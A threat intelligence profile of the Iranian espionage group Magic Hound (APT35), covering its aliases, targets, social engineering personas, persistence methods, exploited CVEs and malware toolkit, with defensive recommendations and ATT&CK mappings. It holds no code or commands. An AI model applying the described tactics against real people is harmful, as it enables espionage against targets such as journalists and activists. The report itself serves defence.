Cyble analyzes Magic Hound – the notorious Iranian cyber espionage group, focusing on its tactics, targets, and campaigns in detail.
Magic Hound is a cyber espionage group believed to be associated with Iran. It has been active since at least 2014 and is known for targeting individuals and organizations primarily in the Middle East, particularly those with ties to Iranian interests. The group has been linked to various campaigns aimed at stealing sensitive information, conducting surveillance, and carrying out espionage activities.
Magic Hound employs a range of tactics, techniques, and procedures (TTPs) in its operations, including spear phishing, social engineering, and the use of custom malware. It often creates sophisticated phishing emails and websites to trick its targets into revealing credentials or installing malware on their systems.
One notable aspect of Magic Hound’s operations is their focus on targeting high-profile individuals, such as journalists, academics, government officials, and activists, who have insights or influence in areas of interest to the Iranian government. By compromising these individuals, Magic Hound seeks to gather intelligence and potentially influence political or social developments in the region.
Cybersecurity researchers and organizations have closely monitored and analyzed the group’s activities, providing valuable insights into its tactics, motives, and potential impact on targeted individuals and organizations.
Figure 1 – Cyble Vision Threat Library (Source: Cyble Vision)
Country of Origin
Magic Hound is an Iranian cyber espionage group.
Targeted Nations
Magic Hound is known for its extensive cyber espionage endeavors, encompassing a diverse array of countries and regions. These include Afghanistan, Belgium, Brazil, Canada, Egypt, France, Iran, Iraq, Israel, Jordan, Kuwait, Morocco, Pakistan, Saudi Arabia, Spain, Syria, Turkey, UAE, UK, USA, Venezuela, Yemen, and Gaza.
Figure 2 – Origin and Targeted Countries (Source: Cyble Vision)
Aliases
Magic Hound goes by a number of aliases in their decade-long history; some of these are:
APT35, Cobalt Illusion, Cobalt Mirage, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, Phosphorus, TunnelVision, UNC788, Yellow Garuda, Educated Manticore, Mint Sandstorm, Ballistic Bobcat, and Charming Cypress.
Targeted Sectors
Magic Hound has a diverse array of attack vectors and techniques that can be customized for its targets. So far, the group has been observed attacking the following sectors:
- Aerospace & Defense
- Education
- Energy & Utilities
- BFSI
- Government & LEA
- Healthcare
- IT & ITES
- Manufacturing
- Organizations
- Technology
- Telecommunication
Links to Other APT Groups
Researchers suspect an overlap of infrastructure between Magic Hound and Rocket Kitten, Newscaster, NewsBeef, ITG18, DEV-0270, and APT42.
Magic Hound Lifecycle
Several infection vectors are associated with Magic Hound, including malicious document files, the use of publicly available Proof of Concepts (PoCs), social engineering, and compromising websites.
Figure 3 – Magic Hound APT Lifecycle
Initial Infection
The threat actors behind Magic Hound strategically leverage multiple platforms, such as email, social media, and chat messengers, to broaden their attack vectors. Social engineering plays a pivotal role in Magic Hound’s tactics during cyber espionage operations. Malicious documents and applications are circulated through personalized engagements with targets, maximizing effectiveness.
Magic Hound’s social engineering attacks commonly employ recruitment offers, journalistic or political analysis requests, romantic entanglements, and anti-government activism feigns. For these to have a maximum chance of success, utilizing foreign languages and understanding diverse societies remain crucial.
To that end, Magic Hound is proficient in English and major European, Middle Eastern, and South Asian languages, indicating a persistent focus on expanding linguistic capabilities to enhance targeted social engineering endeavors.
Phishing
Magic Hound’s phishing campaigns are tailored to bait specific targets, employing various personas tied to media organizations and research institutions. Magic Hound conducted spear-phishing attacks posing as the Rasanah International Institute for Iranian Studies (IIIS), utilizing multiple typo-squatted domains resembling the organization’s actual domain, rasanah-iiis[.]org, to enhance deception and increase the efficacy of their attacks. The figure below shows the phishing email.
Figure 4 – Phishing Email Masquerading as IIIS (Source: Volexity)
Social Engineering
Magic Hound adopted personas of notable figures, such as a journalist from a reputable news outlet. They spoofed email addresses to mimic the journalist’s personal account or used compromised legitimate accounts. Initiating benign conversations, they sought input on articles regarding the Israel-Hamas conflict. These initial emails lacked malicious content, serving to establish trust before potential exploitation.
This strategy, involving the impersonation of familiar figures, tailored phishing lures, and innocuous initial messages, aims to cultivate trust with targets before delivering malicious content. The use of compromised yet legitimate email accounts likely enhanced Magic Hound’s credibility, potentially contributing to the campaign’s success.
The figure below shows a fake social media profile of a researcher at the French National Center for Scientific Research (CNRS), which specializes in imaging and therapeutic strategies for cancers and brain tissues. Magic Hound used this profile in a past campaign.
Figure 5 – Fake social media profile of a French researcher (Source: CERTFA)
Execution and Persistence
In certain instances, threat actors employed malicious .vbs files for persistence in target environments. Upon execution, these .vbs files added entries to the CurrentVersion\Run registry key. Alternatively, Magic Hound established scheduled tasks to connect to attacker-controlled domains and download files. For persistence, Magic Hound also created local accounts, webshells, default accounts, and Domain accounts.
Magic Hound extends its campaign to target MacOS systems. Upon identifying MacOS operating systems among victims, the APT employs Mach-O binaries camouflaged as VPN applications. These binaries facilitate the download and execution of a Bash script-based backdoor known as NokNok.
Exploited Vulnerabilities
The Magic Hound group has exploited various vulnerabilities in their campaigns. Some important vulnerabilities targeted are:
CVE-2023-27350: PaperCut MF/NG Improper Access Control Vulnerability.
CVE-2022-47986: BM Aspera Faspex Code Execution Vulnerability.
CVE-2022-47966: Zoho ManageEngine Multiple Products Remote Code Execution Vulnerability.
CVE-2021-44228: Apache Log4j2 Remote Code Execution Vulnerability.
CVE-2021-45046: Apache Log4j2 Deserialization of Untrusted Data Vulnerability.
CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207: Microsoft Exchange ProxyShell vulnerabilities.
Tools used by Magic Hound
Magic Hound employs a diverse range of tools as its final payload. These RATs encompass BASICSTAR, ChromeHistoryView, CommandCam, CWoolger, DistTrack, DownPaper, FireMalv, FRP, Ghambar, GoProxy, Havij, HYPERSCRAPE, Leash, Matryoshka RAT, MediaPl, Mimikatz, MischiefTut, MPKBot, NETWoolger, NOKNOK, PINEFLOWER, PowerLess Backdoor, POWERSTAR, RATHOLE, PsList, PupyRAT, Sponsor, sqlmap, TDTESS, WinRAR. Researchers can correlate ongoing campaigns by analyzing the IPs and domains associated with past attacks, facilitating the identification and tracking of the group’s activities.
Figure 6 – Magic Hound Tools (Source: Cyble Vision)
BASICSTAR: The RAR + LNK infection chain deploys an undocumented backdoor, identified by Volexity as BASICSTAR. BASICSTAR is capable of exfiltrating system information such as the device’s computer name, username, and operating system. This information is reversed and encoded in base64 before being transmitted to the C&C server.
ChromeHistoryView: ChromeHistoryView is a compact utility designed to extract information from the history data file of the Google Chrome web browser. It presents a comprehensive list of recently visited web pages, including details such as URL, title, visit date/time, number of visits, typed count (indicating how many times the address was manually typed), referrer, and visit ID.
CommandCam: CommandCam is a Windows-compatible open-source tool developed by Ted Burke, enabling users to conveniently capture still images from a webcam via the command line interface.
CWoolger: CWoolger is a keylogger malware used in Operation Woolen Goldfish.
DistTrack: DistTrack, also referred to as Shamoon, is a destructive worm that specifically targets a system’s master boot record (MBR). The name “Shamoon” originated from the original payload, which contained debugging information pointing to a programming database file with this distinct name in the path.
DownPaper: DownPaper, occasionally distributed under the filename sami.exe, is classified as a backdoor trojan. Its primary function involves downloading and executing a second-stage payload.
FireMalv: FireMalv is a credential-stealing tool built on the .NET framework, specifically targeting Firefox. This malicious software is designed to extract passwords stored within the Firefox browser’s storage.
FRP: FRP serves as a swift reverse proxy solution, facilitating the exposure of a local server hidden behind a NAT or firewall to the broader internet.
Ghambar: Ghambar, an information stealer crafted in C#, utilizes a SOAP-based command and control protocol. Despite having fewer features, Ghambar boasts a more refined design and cleaner code style. Notably, it’s engineered to minimize its footprint on the system. When capturing screenshots, clipboard data, and intercepted keystrokes, it endeavors to transmit the data directly to the command and control server without leaving traces on the disk.
GoProxy: GoProxy is a versatile tool that excels as an HTTP, HTTPS, SOCKS5, Shadowsocks, WebSocket, TCP, and UDP proxy, as well as a game shield and game proxy. It supports various proxy types, including forward, reverse, transparent, and NAT proxies. Additionally, it offers features such as HTTPS and HTTP proxy load balancing, SOCKS5 proxy load balancing, socket proxy load balancing, Shadowsocks proxy load balancing, TCP/UDP port mapping, SSH transit, TLS encrypted transmission, protocol conversion, anti-pollution DNS proxy, API authentication, speed limiting, and connection limiting.
Havij: Havij, an automatic SQL Injection tool developed by Iranian security company ITSecTeam, derives its name from “carrot”, its icon. With a user-friendly GUI, Havij simplifies data retrieval, potentially contributing to a shift from code-writing hackers to non-technical users in deploying attacks, owing to its accessibility.
HYPERSCRAPE: HYPERSCRAPE is a tool for extracting user data from Gmail, Yahoo!, and Microsoft Outlook accounts. The attacker employs HYPERSCRAPE on their local system to access victims’ inboxes, utilizing credentials obtained beforehand.
Leash: The leash functions as an IRC Bot utilized for C&C communications. It receives its commands through private messages (PRIVMSG) sent by the adversary, who must also be connected to the IRC server.
Matryoshka RAT: The Matryoshka infection framework comprises three core components: the Dropper, Reflective Loader, and RAT component.
Tasks include obfuscating code and signaling execution to the C&C, launching the loader to execute functions, reporting anti-analysis logic to C&C, employing anti-debugging and anti-sandboxing techniques, resolving runtime API addresses, covert DLL injection of the RAT library, creating persistence files on disk, configuring Reflective Loader for survival across reboots and process exits, facilitating DNS Command and Control communication, and implementing common RAT functionalities.
MediaPl: MediaPl is a backdoor designed to transmit encrypted communications to its C&C server. It disguises itself as Windows Media Player, a widely used application for storing and playing audio and video files.
Mimikatz: Mimikatz offers a comprehensive suite of tools tailored for gathering and leveraging Windows credentials on targeted systems. These tools enable the retrieval of various credentials such as cleartext passwords, Lan Manager hashes, NTLM hashes, certificates, and Kerberos tickets. While these tools generally run successfully on Windows versions from XP onwards, their functionality may be somewhat restricted on Windows 8.1 and later versions.
MischiefTut: MischiefTut is a specialized backdoor constructed using PowerShell, equipped with fundamental functionalities. It can execute reconnaissance commands, store outputs in text files, and purportedly transmit data to infrastructure controlled by adversaries. Additionally, MischiefTut facilitates the downloading of supplementary tools onto compromised systems.
MPKBot: MPKBot is an IRC bot closely resembling the MPK Trojan, employing a proprietary C&C communications protocol and sharing an IP address with the Leash IRC bot in one previous campaign.
NETWoolger: A ‘.NET-based woolen keylogger‘ functions similarly to CWoolger malware. Attackers interchangeably utilize both as alternate infection mechanisms.
NOKNOK: NokNok is a type of backdoor malware specifically targeting macOS (Mac Operating Systems). These programs create a pathway known as a “backdoor,” allowing additional malicious components to infiltrate compromised systems.
PINEFLOWER: PINEFLOWER is an Android malware family renowned for its diverse array of backdoor functionalities. These include pilfering system information, logging phone calls, recording audio, accessing SMS messages, and sending SMS messages. Additionally, the malware facilitates device tracking, file manipulation, connectivity monitoring, and toggling various settings such as Bluetooth, Wi-Fi, and mobile data.
PowerLess Backdoor: PowerLess is a PowerShell backdoor associated with the Phosphorus group. It enables the download of supplementary payloads, including a keylogger and an information stealer.
POWERSTAR: POWERSTAR is a backdoor likely complemented by a custom server-side component, streamlining basic operations for the malware operator. Notably, this latest iteration of the malware boasts an array of intriguing features, such as leveraging the InterPlanetary File System (IPFS) and remotely hosting its decryption function and configuration details on publicly accessible cloud hosting.
RATHOLE: RATHOLE is a reliable, efficient, and high-performing reverse proxy designed for NAT traversal, developed in Rust. Similar to frp and ngrok, RATHOLE facilitates the exposure of services on devices behind NAT to the Internet through a server with a public IP.
PsList: PsList is a tool designed to display a comprehensive list of processes currently active within the operating system. It is an integral component of the SysInternals Tools suite.
PupyRAT: Pupy is an open-source, cross-platform Remote Access Trojan (RAT) and post-exploitation framework primarily developed in Python. It supports loading from a variety of sources, including PE EXE, reflective DLL, Linux ELF, pure Python, PowerShell, and APK.
Sponsor: Sponsor is a backdoor malware that relies on configuration files stored on disk. Batch files surreptitiously install these files and are deliberately crafted to appear harmless, aiming to bypass detection by scanning engines.
Sqlmap: sqlmap is a penetration testing tool available as open source, capable of automating the detection and exploitation of SQL injection vulnerabilities.
TDTESS: TDTESS, a 64-bit .NET binary backdoor, provides a reverse shell and file download and execution capabilities. It maintains regular communication with the C&C server via basic authentication, receiving commands through a web page. The malware conceals a stealth service, evading detection by service managers and enumeration tools.
Network Activities
Magic Hound employs diverse methods to communicate with its C&C servers, such as web protocols, encrypted channels, Ingress tool transfer, and nonstandard ports. An intriguing tactic observed in one campaign involved utilizing the InterPlanetary File System (IPFS). Instead of directly connecting to the threat actor’s C&C, some malware variants initially seek instructions on IPFS, a decentralized network akin to a shared storage space accessible via unique codes. If instructions are found, they are executed; otherwise, the malware resorts to connecting to a C&C hardcoded. This preference for IPFS stems from its decentralized nature, making it challenging for third parties to remove stored files and thus making detection difficult.
Conclusion
The Magic Hound APT group represents a sophisticated and persistent threat actor engaging in diverse cyber espionage and information operations. Known for leveraging social engineering tactics, including phishing and impersonation, across multiple platforms, their campaigns have targeted individuals and organizations globally. With an evolving toolkit and proficiency in multiple languages, Magic Hound continues to pose significant challenges to cybersecurity efforts, necessitating ongoing vigilance and robust defense strategies.
Recommendations:
To mitigate the threat posed by Magic Hound, consider the following recommendations:
User Awareness Training: Educate employees about the risks of phishing attacks and social media attacks and the importance of verifying the legitimacy of people, emails, and attachments before further interaction.
Email Filtering: Implement robust email filtering solutions to detect and block suspicious emails containing malicious attachments or links.
Patch Management: Ensure all systems and software are regularly patched and updated to address known vulnerabilities that Magic Hound could exploit.
Endpoint Protection: Deploy advanced endpoint protection solutions capable of detecting and blocking malicious activity, including the execution of unauthorized scripts and commands.
Network Segmentation: Segment your network to limit the spread of malware in the event of a successful intrusion, isolating critical systems and sensitive data from potential threats.
Incident Response Plan: Develop and regularly test an incident response plan to ensure your organization can quickly and effectively respond to and mitigate any security incidents involving Magic Hound.
Threat Intelligence Sharing: Participate in threat intelligence sharing communities to stay informed about emerging threats and tactics used by Magic Hound and other threat actors.
MITRE attack Techniques Associated with Magic Hound
Figure 7 – MITRE ATT&CK (Source: Cyble Vision)
Vulnerability Scanning (T1595.002): Magic Hound scans known vulnerabilities for exploitation.
Spearphishing Attachment (T1566.001): Magic Hound frequently uses spearphishing emails with malicious attachments to initiate their attacks.
Spearphishing Link (T1566.002): The group also employs spearphishing emails containing malicious links to deliver their payloads.
User Execution (T1204): Magic Hound uses social engineering techniques to convince users to execute its malicious payloads.
Scheduled Task (T1053.005): The group leverages scheduled tasks to establish persistence on compromised systems.
Command and Scripting Interpreter (T1059.003): Magic Hound utilizes command and scripting interpreters to execute malicious scripts and commands on targeted systems.
Exfiltration Over Alternative Protocol (T1048): The group may exfiltrate stolen data using alternative protocols to evade detection.
Data from Local System (T1005): Magic Hound gathers sensitive information from local systems during their operations.
